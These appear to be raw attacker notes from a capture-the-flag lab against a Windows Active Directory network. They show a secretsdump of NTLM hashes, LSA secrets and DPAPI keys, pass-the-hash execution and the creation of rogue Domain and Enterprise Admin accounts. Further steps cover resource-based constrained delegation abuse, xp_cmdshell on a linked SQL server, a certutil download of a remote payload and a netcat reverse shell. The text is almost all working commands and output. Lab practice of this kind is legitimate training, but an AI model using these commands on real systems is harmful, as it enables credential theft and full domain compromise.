Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f97e25e06fa0276f8ac5285638eeeba:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:68a58eed2cff6a92dd8d2d5b9116be4f:::
[*] Dumping cached domain logon information (domain/username:hash)
ZSM.LOCAL/Administrator:$DCC2$10240#Administrator#04a13c983d1c6f2ee43cc9aa0c4d49c6: (2023-08-07 19:12:33)
ZSM.LOCAL/ZPH-GMSA-ADFS$:$DCC2$10240#ZPH-GMSA-ADFS$#053f39834953d372785bf479fd947874: (2023-09-22 13:43:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
ZSM\ZPH-SVRADFS1$:plain_password_hex:a9723786a4f3bfd47aed7f7b5af91aea583274dd3e66baa45ff1a9178238918fdb29d094f5c66cc94a47f054fd93f26a8991498f31f465296377b8b02c7bd7c2033bc3b58756dcc4fe581b99c30098f2904aeb360833fcec2436e12f3b90b10563bcd7cdfd46e9a331e10a9adf79a2ca5ae96f300aa166d67d36d5929b61e81669b2ad1a490ded9d4ac00cf62671108094aba5b1136683d3ee86da651d15a22652bec2f0df761ad75598dc0efa4418bed7677a4cd0f2a15bbc95370768028adc6c850ea157c2d906e4a146e66f7e85cfbf55ca0e9466955bd47e71edb5ecfe1f2ef1e44fd22fc419739da3c0c3444077
ZSM\ZPH-SVRADFS1$:aad3b435b51404eeaad3b435b51404ee:24039a7fd44d8decd80b0897e333ec06:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x05341d094f374bb97fd82b3a19619bbc3d28e967
dpapi_userkey:0xc4de07634653cdeda95b1baea5a86ceaa9683003
[*] NL$KM 
 0000   95 E8 38 F2 47 8A 41 12  A5 77 CA 0A 23 E6 56 28   ..8.G.A..w..#.V(
 0010   85 56 73 10 A9 49 99 6A  B5 5D FB C5 AD B4 4C 76   .Vs..I.j.]....Lv
 0020   3A 07 D8 40 73 ED EE 03  28 5E A6 02 7E 09 38 EA   :..@s...(^..~.8.
 0030   48 55 7F 6D 9C FD 9A 8B  C1 F1 F4 D7 0A 6F 3B D0   HU.m.........o;.
NL$KM:95e838f2478a4112a577ca0a23e6562885567310a949996ab55dfbc5adb44c763a07d84073edee03285ea6027e0938ea48557f6d9cfd9a8bc1f1f4d70a6f3bd0
[*] _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911 
 0000   46 E1 C3 6A F7 6C 78 9D  44 A1 57 77 F3 91 5D DC   F..j.lx.D.Ww..].
 0010   08 C5 13 51 DA C4 52 19  74 D7 D4 17 38 6C 69 FC   ...Q..R.t...8li.
 0020   CC DD F1 45 F3 8C 72 C6  51 19 4B 98 84 76 A6 B9   ...E..r.Q.K..v..
 0030   5C CF 8F 52 ED 3E 3C AE  4E 2C 95 54 A0 80 32 EB   \..R.><.N,.T..2.
 0040   87 AA 5E D5 9D 61 EE FD  3A 80 63 40 F6 68 30 7B   ..^..a..:.c@.h0{
 0050   FC 1E B8 88 96 22 C4 8A  3C 38 F7 6B 4B B7 F5 EC   ....."..<8.kK...
 0060   22 22 09 E7 E2 39 91 3A  C2 31 F8 14 B8 87 1C F2   ""...9.:.1......
 0070   8E 18 AA D1 FC C4 92 F8  BA E9 21 62 E4 3A 3E 07   ..........!b.:>.
 0080   C1 CD D9 AE 47 79 21 A6  72 34 E5 72 DA 73 D6 C1   ....Gy!.r4.r.s..
 0090   C1 3A CF 30 E3 74 C5 14  A2 CF 37 38 43 DF 26 DA   .:.0.t....78C.&.
 00a0   B2 C6 D6 E9 AE CC E9 12  68 90 61 AB 6B 4D F2 CA   ........h.a.kM..
 00b0   CE 92 98 CD 86 BE 84 2E  07 8B 3E 44 30 56 61 6A   ..........>D0Vaj
 00c0   F8 F1 06 B8 F3 EB 36 F3  A0 EC 3E 1C 0B E6 EE 2F   ......6...>..../
 00d0   F3 47 A2 67 23 0A F6 24  9C 6C 92 86 81 53 6C 7A   .G.g#..$.l...Slz
 00e0   5B 85 91 D9 20 41 27 99  26 12 00 A7 32 B0 69 32   [... A'.&...2.i2
_SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911:46e1c36af76c789d44a15777f3915ddc08c51351dac4521974d7d417386c69fcccddf145f38c72c651194b988476a6b95ccf8f52ed3e3cae4e2c9554a08032eb87aa5ed59d61eefd3a806340f668307bfc1eb8889622c48a3c38f76b4bb7f5ec222209e7e239913ac231f814b8871cf28e18aad1fcc492f8bae92162e43a3e07c1cdd9ae477921a67234e572da73d6c1c13acf30e374c514a2cf373843df26dab2c6d6e9aecce912689061ab6b4df2cace9298cd86be842e078b3e443056616af8f106b8f3eb36f3a0ec3e1c0be6ee2ff347a267230af6249c6c928681536c7a5b8591d920412799261200a732b06932
[*] _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911 
 0000   01 00 00 00 24 02 00 00  10 00 12 01 14 02 1C 02   ....$...........
 0010   1A FF 10 1F 7F 61 70 52  F2 C0 21 31 13 BC 93 28   .....apR..!1...(
 0020   09 28 8E A0 99 D7 CA 77  2C 09 81 96 72 02 76 46   .(.....w,...r.vF
 0030   BE A5 09 7C 34 07 09 22  41 68 F1 29 CD EE 92 FA   ...|4.."Ah.)....
 0040   8F 8E 52 65 6A AE 17 62  1A 4A 95 19 6B DC 7C B6   ..Rej..b.J..k.|.
 0050   29 7E 64 5A 36 27 25 69  F0 5F 44 67 4A CA B4 A6   )~dZ6'%i._DgJ...
 0060   AB 00 15 C0 65 9E 16 AA  3A 56 BA D8 1D D1 A4 BB   ....e...:V......
 0070   62 13 D0 9B 47 8E C2 AE  BB 90 39 D0 A6 40 8B 75   b...G.....9..@.u
 0080   FC DF 15 77 CF C0 BC E3  9E B8 79 11 36 F7 D3 5E   ...w......y.6..^
 0090   38 15 DF 93 BC CB 93 FB  00 37 BF F6 96 12 74 FE   8........7....t.
 00a0   18 D4 72 24 4E 98 B4 7E  FE F1 35 3D A4 3F FA 44   ..r$N..~..5=.?.D
 00b0   9A FB 89 BC AE 30 6D 43  B9 7B 31 DB 78 BE 34 CD   .....0mC.{1.x.4.
 00c0   DB 30 91 06 06 F0 40 C7  86 B9 8C F8 E3 1F 88 69   .0....@........i
 00d0   08 22 05 B4 8B F3 8D 4E  00 79 D5 AE FE AF 8A CC   .".....N.y......
 00e0   52 EC DA 47 18 B5 C6 FB  01 E8 71 F9 5F 9B 75 8A   R..G......q._.u.
 00f0   A3 91 92 14 A7 E2 91 48  54 51 5B B4 30 3F 76 21   .......HTQ[.0?v!
 0100   53 43 5B 09 9F 5A 45 8F  43 44 30 5C 93 F5 86 26   SC[..ZE.CD0\...&
 0110   00 00 73 74 50 3E 1E 0A  A6 C4 72 43 65 66 C0 A3   ..stP>....rCef..
 0120   CD 13 DE AC 53 FE C9 1E  18 2D DE A6 BA 41 A9 5A   ....S....-...A.Z
 0130   A8 22 B7 BE 30 D9 1D 33  BB 2C AE 4D 46 2C D7 FC   ."..0..3.,.MF,..
 0140   89 DF F8 FB 57 65 6F E3  1A D5 9C C3 2F F5 8E 79   ....Weo...../..y
 0150   A6 19 92 30 38 0E 22 9F  FA F2 0F 26 79 DE 60 C3   ...08."....&y.`.
 0160   D9 C3 74 F2 22 87 59 64  3E 51 00 52 0C 38 69 2B   ..t.".Yd>Q.R.8i+
 0170   0E FD 07 F1 00 9C 58 1A  FA 9B B3 F5 81 44 B6 E0   ......X......D..
 0180   80 33 85 A2 A2 FA CB 79  35 2F AB 35 0C E9 51 57   .3.....y5/.5..QW
 0190   35 1A 5D 6F 95 EE 2C A9  19 9F 44 C7 3E 20 1E 88   5.]o..,...D.> ..
 01a0   FF 51 DF E5 66 40 7E 87  A6 7E 64 F9 98 68 D5 6C   .Q..f@~..~d..h.l
 01b0   5F C2 CD 20 97 25 7C EB  B8 F8 04 8B 18 49 16 D4   _.. .%|......I..
 01c0   FC D8 85 C0 DF 03 26 9F  B9 B9 69 1C 91 03 12 13   ......&...i.....
 01d0   88 6B C4 A0 D0 5F 69 58  61 73 7C 40 77 A9 6D 0D   .k..._iXas|@w.m.
 01e0   BB B8 3F 44 D6 41 0C E7  70 61 74 87 D5 63 E3 36   ..?D.A..pat..c.6
 01f0   FE E3 07 71 99 07 D4 A5  09 7E F8 B0 F7 3F 07 DB   ...q.....~...?..
 0200   87 A9 13 22 82 3E BC 61  02 3C 0E 28 BF 10 04 2D   ...".>.a.<.(...-
 0210   B4 51 00 00 BD 1B BD D9  88 0B 00 00 BD BD EC 26   .Q.............&
 0220   88 0B 00 00                                        ....
_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911:01000000240200001000120114021c021aff101f7f617052f2c0213113bc932809288ea099d7ca772c09819672027646bea5097c340709224168f129cdee92fa8f8e52656aae17621a4a95196bdc7cb6297e645a36272569f05f44674acab4a6ab0015c0659e16aa3a56bad81dd1a4bb6213d09b478ec2aebb9039d0a6408b75fcdf1577cfc0bce39eb8791136f7d35e3815df93bccb93fb0037bff6961274fe18d472244e98b47efef1353da43ffa449afb89bcae306d43b97b31db78be34cddb30910606f040c786b98cf8e31f8869082205b48bf38d4e0079d5aefeaf8acc52ecda4718b5c6fb01e871f95f9b758aa3919214a7e2914854515bb4303f762153435b099f5a458f4344305c93f5862600007374503e1e0aa6c472436566c0a3cd13deac53fec91e182ddea6ba41a95aa822b7be30d91d33bb2cae4d462cd7fc89dff8fb57656fe31ad59cc32ff58e79a6199230380e229ffaf20f2679de60c3d9c374f2228759643e5100520c38692b0efd07f1009c581afa9bb3f58144b6e0803385a2a2facb79352fab350ce95157351a5d6f95ee2ca9199f44c73e201e88ff51dfe566407e87a67e64f99868d56c5fc2cd2097257cebb8f8048b184916d4fcd885c0df03269fb9b9691c91031213886bc4a0d05f695861737c4077a96d0dbbb83f44d6410ce770617487d563e336fee307719907d4a5097ef8b0f73f07db87a91322823ebc61023c0e28bf10042db4510000bd1bbdd9880b0000bdbdec26880b0000
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
 
└─$ cme smb 192.168.210.14 -u Administrator -H '8f97e25e06fa0276f8ac5285638eeeba' --local-auth -x 'type C:\Users\Administrator\Desktop\flag.txt'
SMB         192.168.210.14  445    ZPH-SVRADFS1     [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRADFS1) (domain:ZPH-SVRADFS1) (signing:False) (SMBv1:False)
SMB         192.168.210.14  445    ZPH-SVRADFS1     [+] ZPH-SVRADFS1\Administrator:8f97e25e06fa0276f8ac5285638eeeba (Pwn3d!)
SMB         192.168.210.14  445    ZPH-SVRADFS1     [+] Executed command via atexec
SMB         192.168.210.14  445    ZPH-SVRADFS1     ZEPHYR{C4n7_F0rg3t_ab0u7_7h1s_0n3} : The Forgotten

.19

 
net user jay Pass123!test /add /domain
net group "Enterprise Admins" jay /add /domain
 
on .16
net user jay Pass@123!test /add /domain
net group "Domain Admins" jay /add /domain
 
Add-DomainObjectAcl -TargetIdentity ZSM-SVRCSQL02$ -PrincipalIdentity jay -Rights All
 
on linux
 
addcomputer.py -method LDAPS -computer-name attackersystem3$ -computer-pass 'Summer2018!' -dc-host 192.168.210.16 'internal.zsm.local/jay:Pass@123!test'
 
 
 
rbcd.py -delegate-from attackersystem3$ -delegate-to ZSM-SVRCSQL02$ -action 'write' 'internal.zsm.local/jay:Pass@123!test'
 
 
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] attackersystem3$ can now impersonate users on ZSM-SVRCSQL02$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     attackersystem3$   (S-1-5-21-3056178012-3972705859-491075245-17602)
 
 
 
getST.py -spn 'cifs/ZSM-SVRCSQL02.internal.zsm.local' -impersonate 'Administrator' 'internal.zsm.local/attackersystem3$:Summer2018!'
 
 
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Getting TGT for user
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
 
 
 
 
 
New-ADUser -SamAccountName "ipsec" -UserPrincipalName "ipsec@internal.zsm.local" -Name "ipsec" -Enable $true -AccountPassword $Password -PassThru -Server "internal.zsm.local"




New-ADUser -SamAccountName "newusername" -UserPrincipalName "newusername@childdomain.local" -Name "New User" -GivenName "New" -Surname "User" -Enabled $true -AccountPassword $Password -PassThru -Server "DCofChildDomain.childdomain.local"

.19

 mssqlclient.py zsm.local/zabbix:rDhHbBEfh35sMbkY@192.168.210.15 
 
exec_as_login sa
 
select srvname from master..sysservers
 
 
select * from openquery("ZSM-SVRCSQL02", 'SELECT is_srvrolemember(''sysadmin'')')
 
 
 
select is_rpc_out_enabled FROM sys.servers WHERE name ='ZSM-SVRCSQL02'
 
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';
 
 
-- Enable show advanced options on the linked server
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [ZSM-SVRCSQL02];
 
-- Enable xp_cmdshell on the linked server
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [ZSM-SVRCSQL02];
 
-- Optionally, you can disable show advanced options again for security
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [ZSM-SVRCSQL02];
 
 
 
-- Execute 'whoami' command on the linked server
EXEC('EXEC xp_cmdshell ''whoami'';') AT [ZSM-SVRCSQL02];
 
-- Execute 'ipconfig' command on the linked server
EXEC('EXEC xp_cmdshell ''ipconfig'';') AT [ZSM-SVRCSQL02];
 
 
 
EXEC('EXEC xp_cmdshell ''certutil -urlcache -f http://10.10.14.4:53/SHALLOW_SPADE.exe C:\Users\mssql_svc\Documents\SHALLOW_SPADE.exe'';') AT [ZSM-SVRCSQL02];
 
 
EXEC('EXEC xp_cmdshell ''C:\Users\mssql_svc\Documents\SHALLOW_SPADE.exe'';') AT [ZSM-SVRCSQL02];
 
 
 
 
 
upload nc64.exe
upload RunasCs.exe
nc -lvvp 53
./RunasCs.exe -l 3 jay Pass@123!test -d internal.zsm.local 'c:\users\mssql_svc\documents\nc64.exe 10.10.14.4 53 -e cmd.exe'
 
 
 
 
 
C:\Users\Administrator\Desktop>type flag.txt
type flag.txt
ZEPHYR{G0tt4_l1nk_Up_4m_1_r1gh7?}
 
$secpasswd = ConvertTo-SecureString "Pass@123!test" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("jay", $secpasswd)
Invoke-Command -ComputerName ZPH-SVRCSUP -ScriptBlock { Get-ChildItem C:\ } -Credential $mycreds

.18 is from .17

$user = 'internal\melissa'
$passwd= 'WinterIsHere2022!'
$secpass = ConvertTo-SecureString $passwd -AsPlainText -Force
$cred = new-object system.management.automation.PSCredential $user,$secpass
Invoke-Command -ComputerName ZPH-SVRCSUP -Credential $cred -ScriptBlock {type c:\users\administrator\desktop\flag.txt}

ZEPHYR{D0n7_f0rg3t_Imp0rt4nt_Inf0rm4710n}